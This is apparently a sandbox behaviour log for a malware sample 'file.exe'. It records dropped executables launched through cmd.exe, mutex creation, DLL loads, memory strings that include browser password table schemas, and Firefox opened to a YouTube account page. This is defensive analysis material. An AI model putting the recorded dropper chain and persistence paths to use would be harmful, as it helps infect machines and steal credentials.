Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\H6P4REFQ.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1816
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8016
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6648
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2764
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: firefox.exe, 0000001E.00000002.3052198523.00000270DA3AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE database( name TEXT PRIMARY KEY, origin TEXT NOT NULL, version INTEGER NOT NULL DEFAULT 0, last_vacuum_time INTEGER NOT NULL DEFAULT 0, last_analyze_time INTEGER NOT NULL DEFAULT 0, last_vacuum_size INTEGER NOT NULL DEFAULT 0) WITHOUT ROWID0;
Source: file.exe, file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2402076310.000000006C7DF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2085082126.0000000002566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084690109.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072848945.0000000022C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401464111.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe Virustotal: Detection: 40%
Source: RoamingCFCGIIEHIE.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: userAKKKFBGDHJ.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAKKKFBGDHJ.exe "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 2376
Source: C:\Users\userAKKKFBGDHJ.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 1048
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1040
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2208 -prefMapHandle 2200 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02178454-e4c2-415f-b68b-05bee77a99df} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270c9b6d510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1316 -parentBuildID 20230927232528 -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {289cd873-04d9-4964-ab61-b0224a3875ef} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270dcbf3310 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 1028
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8056b53a-6eb2-4492-b78e-15b0c58ed1fc} 6396 "\\.\pipe\gecko-crash-server-pipe.6396" 2773686c110 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAKKKFBGDHJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAKKKFBGDHJ.exe "C:\Users\userAKKKFBGDHJ.exe" Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2208 -prefMapHandle 2200 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02178454-e4c2-415f-b68b-05bee77a99df} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270c9b6d510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1316 -parentBuildID 20230927232528 -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {289cd873-04d9-4964-ab61-b0224a3875ef} 5256 "\\.\pipe\gecko-crash-server-pipe.5256" 270dcbf3310 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8056b53a-6eb2-4492-b78e-15b0c58ed1fc} 6396 "\\.\pipe\gecko-crash-server-pipe.6396" 2773686c110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Section loaded: slc.dll Jump to behavior
